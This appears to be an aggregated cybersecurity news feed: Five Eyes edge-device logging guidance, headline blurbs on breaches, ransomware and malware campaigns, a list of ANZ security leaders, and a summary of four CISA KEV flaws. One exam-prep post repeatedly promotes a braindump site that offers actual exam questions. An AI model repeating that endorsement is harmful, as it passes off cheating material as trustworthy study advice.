Logs serve as crucial evidence in cybersecurity investigations, but without proper security measures, they can be altered or deleted by attackers. The guidance outlines best practices such as:
Storing logs in a format compatible with forensic analysis tools
Using coordinated universal time (UTC) timestamps in ISO 8601 format
Running network time protocol (NTP) services for accurate time synchronization
Implementing log integrity protections and alerting mechanisms for unusual log tampering

By implementing these measures, organizations can ensure that logging mechanisms support effective incident response.

3. Remote Logging and Event Push Support

To prevent attackers from deleting local logs, the guidelines advocate for real-time log transfer using encrypted protocols. Devices should:
Support standardized log formats that third-party platforms can process
Use TLS encryption to secure log transmission
Maintain periodic "heartbeat" messages to confirm operational status
Warn administrators when remote logging is disabled or misconfigured

This approach strengthens the ability to detect and investigate cyber incidents even when attackers attempt to cover their tracks.

4. Volatile and Non-Volatile Data Collection

Forensic investigations often require both volatile (real-time system state) and non-volatile (long-term storage) data. The guidance recommends that devices should be able to collect:
Process activity and parent-child relationships
Open network connections, including IP addresses and ports
Firewall and packet processing rules
Kernel memory maps and dynamically loaded modules
Address Resolution Protocol (ARP) and DHCP lease tables

Additionally, non-volatile storage should support full data collection, with decryption capabilities provided to system owners. Secure boot processes, Trusted Platform Modules (TPM), and strict access controls should be implemented to prevent unauthorized data extraction.

Why These Guidelines Matter

Manufacturers play a crucial role in implementing these guidelines by designing devices that are secure by default. By integrating advanced logging, forensic tools, and security controls at the hardware and firmware levels, they can reduce the risk of exploitation. By defining clear security and forensic standards, these guidelines offer significant benefits for both manufacturers and organizations:
Improved Threat Detection: Comprehensive logging and monitoring provide network defenders with better visibility into suspicious activity.
Faster Incident Response: Secure forensic capabilities enable quicker identification and mitigation of security breaches.
Enhanced Accountability: Mandatory audit trails make it easier to track changes and identify the origin of cyber incidents.
Stronger Compliance: Adhering to these best practices helps organizations meet regulatory requirements for cybersecurity and data protection.

The Role of Manufacturers in Strengthening Security

Edge device manufacturers play a crucial role in cybersecurity by ensuring their products are secure by design. The guidelines recommend that vendors:
Enable Secure Logging by Default: Devices should log security-related events by default, rather than requiring manual configuration.
Adopt Secure-by-Design Principles: Manufacturers should integrate security features during the product development phase rather than treating them as afterthoughts.
Provide Regular Firmware Updates: Vendors must proactively patch vulnerabilities and offer extended support for their devices.
Offer Transparent Security Reporting: Manufacturers should publish security advisories detailing vulnerabilities and recommended mitigations.

Conclusion

As cyber threats targeting edge devices continue to grow, organizations must prioritize security by implementing the recommendations outlined in these guidelines. By ensuring robust logging, enforcing secure configurations, applying timely updates, and adopting strong authentication measures, businesses can significantly reduce their exposure to cyber risks. Likewise, manufacturers must take responsibility for delivering secure products that empower organizations to defend against sophisticated threats. By fostering collaboration between cybersecurity agencies, manufacturers, and enterprises, the industry can create a more resilient and secure digital ecosystem. Edge devices will remain critical components of modern networks, but with the right security measures in place, organizations can mitigate the risks and enhance their overall cybersecurity posture.

References:
https://www.ncsc.gov.uk/news/cyber-agencies-unveil-new-guidelines-to-secure-edge-devices-from-increasing-threat
https://www.ncsc.gov.uk/guidance/guidance-on-digital-forensics-protective-monitoring
https://www.cyber.gc.ca/en/news-events/five-eyes-publish-series-sound-alarm-cyber-security-threats-edge-devices

The post Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers appeared first on Cyble.

by CYBLE

Such a vulnerability — which stems from a USB Video Class driver out-of-bounds write issue that could be exploited for privilege escalation — may have been used by forensic data extraction tools, according to the GrapheneOS development team.

by SC Media

Spanish authorities have arrested an 18-year-old hacker known as "Natohub," accused of breaching multiple high-profile government and military systems, including databases belonging to NATO, the U.S. Army, and Spain's Ministry of Defense. The hacker, who operated under multiple aliases on dark web forums, carried out at least 40 cyberattacks throughout 2024, targeting both public institutions … The post Police Arrest Hacker Behind Attacks on U.S. and NATO Systems appeared first on CyberInsider.

by Cyber Insider

The Dallas suburb noted in an online notice that the incident resulted in the compromise of names, addresses, Social Security numbers, credit card details, driver's license numbers, medical insurance data, and financial account details.

by SC Media

A new wave of large-scale phishing attacks is exploiting Scalable Vector Graphics (SVG) files to bypass security measures, evade detection, and automate credential theft. Sophos researcher Andrew Brandt reports that these attacks, which have escalated significantly since mid-January 2025, use embedded JavaScript, Cloudflare CAPTCHA gates, and even malware payloads—making them more sophisticated than previous SVG … The post SVG Phishing Attacks Escalate, Now Using CAPTCHA for Evasion appeared first on CyberInsider.

by Cyber Insider

A Cisco Talos report also indicated a sharp increase in remote access tools being leveraged in ransomware. 

by Cybersecurity Dive

Spanish Police arrested an unnamed hacker who allegedly breached tens of government institutions in Spain and the US. Spanish National Police arrested a hacker responsible for multiple cyberattacks on government institutions in Spain and the U.S. Targets included the U.S. Army, UN, NATO, and other agencies. Some of the breached organizations are the U.S. Army, […]

by Security Affairs

7AI has launched an agentic security platform, which uses AI agents to handle repetitive tasks. The post 7AI Launches With $36 Million in Seed Funding for Agentic Security Platform appeared first on SecurityWeek.

by SecurityWeek

British-based engineering firm IMI plc has disclosed a security breach after unknown attackers hacked into the company's systems. [...]

by BleepingComputer

Onapsis announced Onapsis Control Central for SAP application security testing and custom code security supporting RISE with SAP transformations. As the latest addition to its Onapsis Control product line, Control Central is a reinvention of Onapsis’ award-winning Control product. Control Central is a key component of the Onapsis Secure RISE Accelerator, working to streamline and de-risk large RISE with SAP projects for global enterprises. For organizations driving DevSecOps initiatives, Control Central offers application security testing … More → The post Onapsis Control Central secures SAP software development lifecycle appeared first on Help Net Security.

by Help Net Security

Cyabra introduces Insights, a new AI-feature designed to transform complex social media disinformation data into clear, actionable answers in seconds. False narratives, fake accounts, and AI-generated content are spreading faster than ever, costing businesses and governments billions annually and eroding public trust and reputations. With AI-generated disinformation spreading six times faster than the truth—especially during high-stakes events like elections and holiday seasons—the need for rapid-response tools has never been more critical. Insights takes the complexity … More → The post Cyabra Insights protects against AI-driven digital disinformation appeared first on Help Net Security.

by Help Net Security

Passing the EC-Council ICS-SCADA (Industrial Control Systems - Supervisory Control and Data Acquisition) exam on your first attempt requires a well-structured preparation strategy, the right resources, and consistent effort. Here's how I did it, along with tips and resources to help you succeed.

Preparation Tips

1. Understand the Exam Objectives
Familiarize yourself with the official EC-Council ICS-SCADA exam blueprint. Focus on key areas such as ICS-SCADA fundamentals, network protocols, threat modeling, vulnerability assessment, and incident response.

2. Create a Study Plan
Dedicate 2-3 hours daily for at least 4-6 weeks. Break down the syllabus into manageable sections and allocate time for each topic.

3. Hands-On Practice
Set up a virtual lab environment to practice ICS-SCADA concepts. Use tools like Wireshark, Nessus, and Metasploit to simulate real-world scenarios.

4. Take Notes and Revise
Summarize key concepts in your own words for quick revision. Use flashcards for memorizing protocols, ports, and attack vectors.

5. Practice with Mock Exams
Simulate the exam environment by taking timed practice tests. Analyze your performance and focus on weak areas.

6. Join Online Communities
Participate in forums like Reddit, TechExams, or EC-Council's official community to discuss doubts and share resources.

Resources

To ace the ICS-SCADA exam, you need reliable and up-to-date study materials. Here are the resources I used:

1. Official EC-Council Study Guide
The official guide covers all exam topics in detail and is a must-have resource.

2. Online Courses
Platforms like Udemy, Coursera, and Cybrary offer ICS-SCADA-specific courses. Look for courses with hands-on labs and practical exercises.

3. Books
"Industrial Network Security: Securing Critical Infrastructure Networks" by Eric D. Knapp and Joel Thomas Langill.
"Cybersecurity for Industrial Control Systems: SCADA, DCS, PLC, HMI, and SIS" by Tyson Macaulay.

4. Practice Tests
Practice tests are crucial for understanding the exam format and identifying weak areas. Use platforms like Boson, Exam-Labs, and Killerdumps for high-quality practice questions.

5. Killerdumps
This platform has been a trusted resource for over 7 years, providing the best study material for certification exams. Their ICS-SCADA exam questions are highly accurate and closely aligned with the actual exam. The platform offers detailed explanations for each question, helping you understand the concepts thoroughly. Many candidates, including myself, have found this platform to be an invaluable resource for passing the exam on the first attempt.

6. Virtual Labs
Use platforms like Hack The Box or TryHackMe to practice penetration testing and vulnerability assessment in a controlled environment.

7. YouTube Tutorials
Channels like John Hammond, The Cyber Mentor, and NetworkChuck offer free tutorials on ICS-SCADA and related topics.

Final Tips

Stay consistent with your preparation and avoid last-minute cramming. Focus on understanding concepts rather than memorizing answers. Use Killerdumps for reliable ICS-SCADA exam questions and practice tests to build confidence. On exam day, read each question carefully and manage your time effectively. With the right preparation and resources, passing the EC-Council ICS-SCADA exam on your first attempt is absolutely achievable. Good luck!

by HACKLIDO

Experts question whether Edward Coristine, a DOGE staffer who has gone by “Big Balls” online, would pass the background check typically required for access to sensitive US government systems.

by WIRED Security News

Starting a security program can be challenging for some organizations, especially running a mature program across a large business. Resourcing, lack of organization, and not having a clear remediation strategy are key aspects to the failure of some programs, which can all result in severe breaches of businesses. I’ll walk through seven steps that will […] The post Six steps for running a successful security program appeared first on Outpost24.

by Outpost24

Malvertisers got inspired by the website for a German university to bypass ad security and distribute malware.

by Malwarebytes Labs

by ComputerWeekly

In this Help Net Security interview, Oliver Friedrichs, CEO at Pangea, discusses why strong data hygiene is more important than ever as companies integrate AI into their operations. With AI-driven applications handling sensitive enterprise data, poor access controls and outdated security practices can lead to serious risks. Friedrichs shares key best practices to mitigate risks, ensure data reliability, and adapt security strategies for the AI landscape. How do data hygiene practices align with broader cybersecurity … More → The post The overlooked risks of poor data hygiene in AI-driven organizations appeared first on Help Net Security.

by Help Net Security

Snyk’s integration with Google Cloud Security Command Center (SCC) enables CISOs and security teams to monitor and manage AppSec vulnerabilities and misconfigurations from Snyk alongside cloud security issues from Google Cloud, all within a single pane of glass.

by Snyk

AI is driving significant changes in attack sources, with 88% of enterprises observing an increase in AI-powered bot attacks in the last two years, according to Arkose Labs. 53% said they have lost between $10 million to over $500 million during the past two years due to negative consequences related to cyberattacks. Enterprises are investing heavily in AI-powered solutions, which make up 21% of cybersecurity budgets today and will increase to 27% by 2026. 62% … More → The post Enterprises invest heavily in AI-powered solutions appeared first on Help Net Security.

by Help Net Security

As cyber threats become more advanced, the need for strong leadership in cybersecurity is clearer than ever. Across Australia and New Zealand, cybersecurity leaders are on the front lines, protecting everything from financial systems to critical infrastructure. They are facing growing challenges as cybercriminals and state actors target key sectors, making their role in securing networks, strengthening resilience, and defending vital industries essential to our safety and economy. Recognizing the importance of cybersecurity, the Australian government has pledged $15–$20 billion by 2033–34 to enhance the nation's cyber capabilities, including strengthening offensive cyber operations through the REDSPICE program. This move highlights the growing recognition of cybersecurity's critical role in safeguarding the country. In this article, we spotlight the top 100 cybersecurity leaders in the ANZ region, individuals who are leading the charge to keep systems secure, shape policy, and create innovative solutions in the ever-evolving world of cybersecurity. Their expertise and efforts are vital in defending against digital threats and ensuring the resilience of our infrastructure.

The Role of Cybersecurity Leaders in the ANZ Region

Cybersecurity leaders in the ANZ region play a multifaceted role, from securing critical infrastructure to leading innovative security strategies for organizations. Their efforts are not confined to internal risk management – they are also working collaboratively with both governments and private sectors to build stronger defenses against the ever-evolving threat landscape. The cybersecurity leaders in the region span various industries, from banking to healthcare, government, and beyond. These leaders are instrumental in creating frameworks, driving policy changes, and advancing the development of next-gen security technologies that can stay ahead of the curve when it comes to evolving threats.
Top 100 Cybersecurity Leaders in the ANZ Region

Here is a list of 100 cybersecurity leaders in the ANZ region who have made remarkable contributions to the field, helping secure organizations and drive policy change in the face of growing cyber threats: Name Designation Organization Name Aaron Bailey CISO The Missing Link Aaron McKeown CISO Vector Limited Ad Wolst Head of Cyber Security Engineering & Platform Services Bupa Adwin Singh Cyber Security Domain Lead - CISO Office Inland Revenue NZ Akash Mittal CISO Sumitomo Forestry Australia Alissa Maclean Cyber Security Engineer Manager Australian Red Cross Lifeblood Alistair Vickers CISO Horizon Energy Group Limited Dr. Amit Chaubey CEO NIAD Technologies Anand Patil Head of Cyber Security Teladoc Health Andy Tamara Head of Security humm group Andy Pace Network & Information Security Manager MediaWorks NZ Annie Hagar Cyber Security Partner Norton Rose Fulbright Antonio (Tony) Lou Cyber Security Manager Bendigo Health Anya Avinash Head of Cybersecurity Bank First Arun Singh ANZ Chief Information Security Officer Zip Co Babu Srinivas Global Head - Cyber Competency & Digital Trust BHP Barney Rehfisch IT Operations Manager Nando's Australia & New Zealand Barry Anderson Information Security Architecture, Strategy and Engineering Manager HESTA Bethwyn Berry Head of Cybersecurity, PMO & Governance Bluescope Australian Steel Products (ASP) at Bluescope Callum Nelson CISO EBOS Group Limited Charles Gonzalez CISO Metcash Christopher Lowe GM Cybersecurity Ainsworth Game Technology Cody Keeltka CISO Australian Payments Plus Crispin Apsey Cyber Security and Operations Manager SecurePay Dan Maslin Global Chief Information Security Officer Monash University Dane Maslen CISO Kami Mohammad Arif Head of Information Security (CISO) Guild Group Darren Kane CISO nbn® Australia David Geber General Manager Information Security & Risk REST Dean Kastelic Security Advisor / vCISO Bapcor Limited Doug Hammond Chief Information Security Officer 
Uniting Care Edmond Loza Group Manager - Cyber Security Workwear Group Eshan Dissanayake CISO Officeworks Fred Hadad Chief Information Security Officer Excite Cyber Fred Thiele CISO Interactive Garry Bentlin Group CISO Nine George Abraham Chief Information Security Officer Frontier Software Grant Anthony CISO Orion Health Hari Jegatheeswaran Australian CISO & Head of APAC Cyber Operations Deloitte Australia Harsh Busa CISO Avant Mutual Ivan Dobay Senior Cybersecurity Risk and Governance Partner ANSTO James Ng General Manager - Cyber Security (CISO) Insignia Financial Jeff Whitton Founder Yirigga Jeremy Koster CISO Transgrid Johann Blignaut Head of Group IT Cyber & Data Protection Crown Resorts John Ooi CISO Australian Unity Kapil Yewale Head of Cybersecurity Clearview Kevin O Sullivan Acting Chief Solutions Officer/ Head of Cyber & Information Security Kinetic IT Kirk Stephen Head of Cyber Security Baby Bunting Lee Barney CISO TPG Telecom Leron Zinatullin Chief Information Security Officer Linkly Group Liam Connolly CISO SEEK Louisa Vogelenzang Head of Cybersecurity Asia Pacific & Japan (APJ) | BISO | Senior Director Dayforce Lukasz Gogolkiewicz Head of Cyber Security Accent Group Limited Luke E Cyber Security Defense Lead Bunnings Mackenzie Muir CISO Allianz Australia Manasseh Paradesi CISO Tyro Payments Mario Ellaz CISO AusNet Mark Leighton CISO Aurecon Mark Haldane Head of Cyber Defence Coles Group Mark Spadafora Chief Technology Officer National Cyber Security Centre Mazino Onibere Head of Cyber Security, Risk and Compliance Regis Aged Care Mohan Swamy Cyber Security Manger / leader Pacific Blue Australia Neha Sharma CISO The Star Entertainment Group Nidhin Tamil Chief Information Security Officer Boral Nigel Hedges General Manager - IT Security Risk & Compliance (CISO) Chemist Warehouse Jean-Baptiste B. 
CISO / Director of Technology - Security, Risk & Compliance AMP Peeyush Khare Head of Cyber Security Practice - APAC Tech Mahindra Pieter van der Merwe CISO Woolworths Group Pritam Rakshit CISO Cuscal Limited Richard Watson Global & Asia-Pacific Cybersecurity Consulting Leader EY Robert Turney CISO auDA - .au Domain Administration Ltd. Robert Veres CISO Colonial First State Roxanne (R) Pashaei CISO NSW Rural Fire Service Sam Fariborz CISO David Jones Sam Conde Head of IT - Security Dyson Group of Companies Samrat Seal Group Manager - Cyber Security Kmart Australia Limited Sanja Marais Chief Technology and Security Office Aspen Medical Santanu Laudh Chief Information Security Officer OFX Sara Abak CISO Intellihub Group Serkan Tek Infrastructure & Information Security Team Leader Premiere Retail Shane Marquis Manager Cyber Security Architecture Asahi Shannon Remedio Cyber Tech Engineering Lead Bupa Sourish Datta CISO Victorian Government Stefan Sherkat CISO Reece Group Stephen Bennett Global Chief Information Security Officer Domino's Pizza Enterprises Limited Steven Rebello CISO Endeavour Group Sunil Saale Chief Information Security Officer MinterEllison Tara Dharnikota Head of Information Security Management PEXA Terry Reidy Associate Director Cybersecurity Operations and Capability University of Melbourne Tharaka Perera Head of Information Security Estia Health Ltd Tharusha Udugama Cybersecurity Manager HPX Group Tim Litton Acharya CIO SafetyCulture Varun Balakrishnan CISO Healthscope Venkat Krishnan CISO TAL Australia Vijay Krishnan CISO UniSuper Vijay Narayanan CISO Mercy Health Australia Vishal Kumar Gupta Global IT Security Governance and Risk Lead Hansen Technologies Vishwanath Nair Head Cyber Risk & Compliance (CISO) BaptistCare Will Sharpe CISO Telstra Health

by The Cyber Express

Apple's Safari browser includes several features aimed at enhancing privacy while browsing the web. Two of the most notable privacy features are Intelligent Tracking Prevention (ITP) and Private Browsing mode.

Intelligent Tracking Prevention (ITP)

Intelligent Tracking Prevention (ITP) is a feature built into Safari to prevent advertisers and websites from tracking your browsing activity across different sites. It works by limiting the ability of trackers (like cookies) to follow you across websites. ITP is enabled … More → The post How to customize Safari for private browsing on iOS appeared first on Help Net Security.

by Help Net Security

Cheap banking scams are often easier to pull off in a country with older devices, fewer regulations, and experienced fraudsters.

by Dark Reading

The gaming industry has grown into a massive global market, with millions of players engaging in online multiplayer…

by Hackread

The North Korea-linked APT group Lazarus uses a cross-platform JavaScript stealer to target crypto wallets in a new hacking campaign. Bitdefender researchers reported that the North Korea-linked Lazarus group uses fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver a cross-platform JavaScript stealer to target crypto wallets in a new hacking campaign. Scammers lure […]

by Security Affairs

The Payment Card Industry Security Standards Council (PCI SSC) just announced a change to Self Assessment Questionnaire A (SAQ A). The change eliminates two (2) requirements relevant to eCommerce sites, 6.4.3 and…

by TrustedSec

San Francisco application security startup raises $100 million in a Series D funding round led by Menlo Ventures.  The post Semgrep Raises $100M for AI-Powered Code Security Platform appeared first on SecurityWeek.

by SecurityWeek

Elon Musk's DOGE has taken control and accessed large swathes of Americans' private information held by the U.S. federal government. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

WhatsApp said users in several European countries were targeted with Paragon spyware, according to the Italian government.

by TechCrunch

Chrome isn't the most secure browser on the market and with the continued rise of malicious attacks, you should consider one of these Chrome-based alternatives.

by ZDNET Security

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Linux kernel vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Linux kernel vulnerability, tracked as CVE-2024-53104, to its Known Exploited Vulnerabilities (KEV) catalog. The February 2025 Android security updates addressed 48 vulnerabilities, including the zero-day flaw CVE-2024-53104, which is actively exploited in attacks […]

by Security Affairs

Proton Pass and 1Password offer secure password safekeeping with similarly priced plans. Still, one service may suit your needs better than the other. Here's how to pick the right one.

by ZDNET Security

The North Korea-linked Lazarus Group has been linked to an active campaign that leverages fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware capable of infecting Windows, macOS, and Linux operating systems. According to cybersecurity company Bitdefender, the scam begins with a message sent on a professional social media network, enticing them with the promise of

by The Hacker News

While probabilities may be based on subjective information, when used in an objective framework, they demonstrate an effective way to improve the value of hard decisions.

by Dark Reading

The company's annual reflection on safe AI development comes amid shifting guidance around military AI.

by ZDNET Security

Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers. In a report published Wednesday, crypto forensics firm Chainalysis said that while ransomware gang leak sites posted more victims than in previous years during 2024, fewer victims gave in to the hackers' demands. Chainalysis reported […]

by TechCrunch

Cloud computing powers everything from remote work to large-scale data analytics. But its vulnerabilities continue to challenge organizations of all sizes. 

by Legit Security

If your business processes credit card data, protecting client information is a key responsibility. The Security Standards Council (SSC) developed Payment Card Industry (PCI) Data Security Standards (DSS) to make these protections easier to achieve.

by Legit Security

Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) spot application vulnerabilities at different development and deployment stages. 

by Legit Security

Cybercriminals are increasingly leveraging legitimate HTTP client tools to facilitate account takeover (ATO) attacks on Microsoft 365 environments. Enterprise security company Proofpoint said it observed campaigns using HTTP clients Axios and Node Fetch to send HTTP requests and receive HTTP responses from web servers with the goal of conducting ATO attacks. "Originally sourced from public

by The Hacker News

Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year. [...]

by BleepingComputer

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report

by The Hacker News

The latest target of Paragon spyware openly questions if he was targeted by the Italian government.

by TechCrunch

Veeam has released patches to address a critical security flaw impacting its Backup software that could allow an attacker to execute arbitrary code on susceptible systems. The vulnerability, tracked as CVE-2025-23114, carries a CVSS score of 9.0 out of 10.0. "A vulnerability within the Veeam Updater component that allows an attacker to utilize a Man-in-the-Middle attack to execute arbitrary code

by The Hacker News

The dismantling of USAID by Elon Musk's DOGE and a State Department funding freeze have severely disrupted efforts to help people escape forced labor camps run by criminal scammers.

by WIRED Security News

New research highlights how bad actors could abuse deleted AWS S3 buckets to create all sorts of mayhem, including a SolarWinds-style supply chain attack.

by Dark Reading

The SVG file format can harbor malicious HTML, scripts, and malware

by Sophos News

Human communication is multimodal. We receive information in many different ways, allowing our brains to see the world from various angles and turn these different “modes” of information into a consolidated picture of reality. We’ve now reached the point where artificial intelligence (AI) can do the same, at least to a degree. Much like our […] The post Stress-testing multimodal AI applications is a new frontier for red teams appeared first on Security Intelligence.

by Security Intelligence

Enterprises are shifting from chasing trends to strategically modernizing legacy systems, leveraging existing infrastructure with modern enhancements to maximize business value and future-proof operations.

by ITPro Today

A newly disclosed vulnerability affecting AMD's Zen 1 through Zen 4 CPUs allows attackers with local administrator privileges to load malicious microcode patches, potentially compromising confidential workloads. The issue, discovered by Google's Security Team, stems from the use of an insecure hash function in AMD's microcode signature verification process, raising concerns over Secure Encrypted Virtualization-Secure … The post AMD EPYC and Ryzen CPUs Affected by Severe Security Flaw appeared first on CyberInsider.

by Cyber Insider

A threat actor known as FutureSeeker has leaked a database allegedly stolen from Trump Hotels, exposing the personal details of over 164,900 individuals. The dataset, allegedly sourced from Trump Hotels' invitations list, was posted on BreachForums yesterday. The leaked records include full names, email addresses, invitation statuses, and timestamps, raising concerns about potential phishing attacks … The post Trump Hotels Allegedly Breached, 164,900 Records Leaked Online appeared first on CyberInsider.

by Cyber Insider

As the cybersecurity landscape continues to evolve, proactive vulnerability management has become a critical priority for managed service providers (MSPs) and IT teams. Recent trends indicate that organizations increasingly prioritize more frequent IT security vulnerability assessments to identify and address potential security flaws. Staying informed on these trends can help MSPs and IT teams

by The Hacker News

The FCC has proposed a $4,492,500 fine against VoIP service provider Telnyx for allegedly allowing customers to make robocalls posing as a fictitious FCC "Fraud Prevention Team," by failing to comply with Know Your Customer (KYC) rules. However, Telnyx says the FCC is mistaken and denies the accusations. [...]

by BleepingComputer

A banking malware campaign using live phone numbers to redirect SMS messages has been identified by the zLabs research team, uncovering 1,000+ malicious apps and 2.5GB of exposed data.

by Hackread

Web shops are an attractive target. How can SMBs keep theirs safe?

by Malwarebytes Labs

A sophisticated cyberattack campaign is targeting organizations that still rely on Active Directory Federation Services (ADFS) for authentication across applications and services.

by Dark Reading

Never lose your wallet again with Apple AirTag tracking accessories from expert-tested brands like Nomad, ESR, Ridge, and more.

by ZDNET Security

Simple tips for fighting spam email.

by Kaspersky

Payments to ransomware actors decreased 35% year-over-year in 2024, totaling $813.55 million, down from $1.25 billion recorded in 2023. [...]

by BleepingComputer

Assad regime effectively exploited the region's existing disinformation networks, inserting narratives into popular sociopolitical causes. The post Assad's silent network: Syrian influence operations in Latin America appeared first on DFRLab.

by DFRLab

A malware campaign has been observed delivering a remote access trojan (RAT) named AsyncRAT by making use of Python payloads and TryCloudflare tunnels. "AsyncRAT is a remote access trojan (RAT) that exploits the async/await pattern for efficient, asynchronous communication," Forcepoint X-Labs researcher Jyotika Singh said in an analysis. "It allows attackers to control infected systems

by The Hacker News

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft .NET Framework, Apache OFBiz, and Paessler PRTG Network Monitor flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: In September 2024, Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) […]

by Security Affairs

2025-02-05 14:50:00

MySpace? Your security

In the early 2000s, one of the hardest choices many of us faced online was selecting our MySpace “Top 8”... The post MySpace? Your security appeared first on Sysdig.

by Sysdig

The Blink Mini 2 is a feature-rich security camera that you can get for $20. An extra $10 gets you a waterproof adapter that makes the deal that much sweeter.

by ZDNET Security

Enabling Private DNS Mode on Android means your searches and other DNS queries are encrypted and safe from prying eyes. Here's everything else you need to know.

by ZDNET Security

Silver Spring, Maryland, 5th February 2025, CyberNewsWire

by Hackread

Cloudflare achieves ENS certification, and intends to pursue FedRAMP High and IRAP.

by Cloudflare

The rising influence of artificial intelligence (AI) has many organizations scrambling to address the new cybersecurity and data privacy concerns created by the technology, especially as AI is used in cloud systems. Apple addresses AI’s security and privacy issues head-on with its Private Cloud Compute (PCC) system. Apple seems to have solved the problem of […] The post Cybersecurity awareness: Apple’s cloud-based AI security system appeared first on Security Intelligence.

by Security Intelligence

Our zLabs research team has discovered a mobile malware campaign consisting of almost 900 malware samples primarily targeting users of Indian banks. The post Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach appeared first on Zimperium.

by Zimperium

CISA has ordered federal agencies to secure their systems within three weeks against a high-severity Linux kernel flaw actively exploited in attacks. [...]

by BleepingComputer

Canadian man charged in $65 million DeFi hack. Exploited KyberSwap, Indexed Finance smart contracts, laundered funds, and attempted extortion. Faces 20 years.

by Hackread

A help desk phishing campaign targets an organization's Microsoft Active Directory Federation Services (ADFS) using spoofed login pages to steal credentials and bypass multi-factor authentication (MFA) protections. [...]

by BleepingComputer

Accessibility is still vital for businesses despite recent federal actions.

by ITPro Today

Ransomware gangs continued to wreak havoc in 2024, but new research shows that the amounts victims paid these cybercriminals fell by hundreds of millions of dollars.

by WIRED Security News

The ALPHV ransomware group, also known as BlackCat, emerged in November 2021 as a sophisticated cybercrime organization operating under a Ransomware-as-a-Service (RaaS) model. In February 2024, they attacked UnitedHealth Group's subsidiary, Change Healthcare, leading to significant disruptions in the U.S. healthcare sector. UnitedHealth paid a $22 million ransom to ALPHV following the attack. The breach compromised the personal information of over 100 million individuals, marking the largest healthcare data breach in U.S. history. The U.S. Department of State has offered rewards of up to $10 million for information leading to the identification or location of ALPHV/BlackCat leaders.

by Picus Security

In late 2024, Kaspersky experts discovered a malicious campaign, called SparkCat, spreading malware to target crypto wallets. In March 2023, ESET found malware in modified versions of messengers using OCR to scan the victim’s gallery for images with recovery phrases to restore access to crypto wallets. In late 2024, Kaspersky discovered a new malicious campaign, […]

by Security Affairs

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely used software products, have been actively exploited by cyber attackers.

With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems.

Detailed List of Vulnerabilities Highlighted in the Known Exploited Vulnerabilities Catalog

CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability

The first of the vulnerabilities, CVE-2024-45195, relates to a flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat.

The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges.

CVE-2024-29059: Microsoft .NET Framework Information Disclosure

The second addition, CVE-2024-29059, is a critical information disclosure vulnerability affecting Microsoft .NET Framework. This flaw can allow attackers to access sensitive information stored within the system by exploiting weaknesses in error handling. With a CVSS score of 7.5 (High), this vulnerability is serious and can be exploited by attackers to access privileged information in systems running older versions of .NET Framework, specifically 4.8, 3.5, and 4.7.2.

The impact of this vulnerability is widespread, affecting Windows 10 and Windows Server versions, making it a concern for organizations relying on these platforms. The flaw is also listed in CISA's Known Exploited Vulnerabilities Catalog, reinforcing its immediate need for attention and patching to prevent potential breaches.

CVE-2018-9276: Paessler PRTG Network Monitor OS Command Injection

Another critical vulnerability is CVE-2018-9276, a command injection flaw discovered in PRTG Network Monitor versions prior to 18.2.39. This vulnerability allows attackers with administrator privileges on the system to inject operating system commands into the network monitor system. By sending malformed parameters to the system, attackers can execute arbitrary commands both on the server and on networked devices.

PRTG Network Monitor is widely used for IT network monitoring, and an attacker exploiting this flaw could gain complete control over the system and its connected infrastructure. This vulnerability has been identified as a significant attack vector for malicious actors, potentially compromising entire networks. Users of affected versions must update their software to address this flaw.

CVE-2018-19410: Paessler PRTG Network Monitor Local File Inclusion

Another vulnerability in PRTG Network Monitor, CVE-2018-19410, involves a Local File Inclusion (LFI) issue, which allows unauthenticated attackers to bypass security mechanisms and escalate privileges. Attackers exploiting this flaw can create users with read-write privileges, including administrator-level access, by crafting malicious HTTP requests. This vulnerability has been confirmed to affect PRTG versions before 18.2.40.1683.

Once exploited, this flaw can lead to severe compromises in the security of networked systems by allowing attackers to perform unauthorized actions, such as adding new administrative users and accessing sensitive data. CISA included this vulnerability in its Known Exploited Vulnerabilities Catalog after determining that it was actively being targeted by cybercriminals.

Conclusion

The vulnerabilities identified by CISA, such as CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, highlight ongoing cybersecurity trends, particularly in the vulnerability space. Organizations are encouraged to regularly monitor for updates and patch their systems without delay.

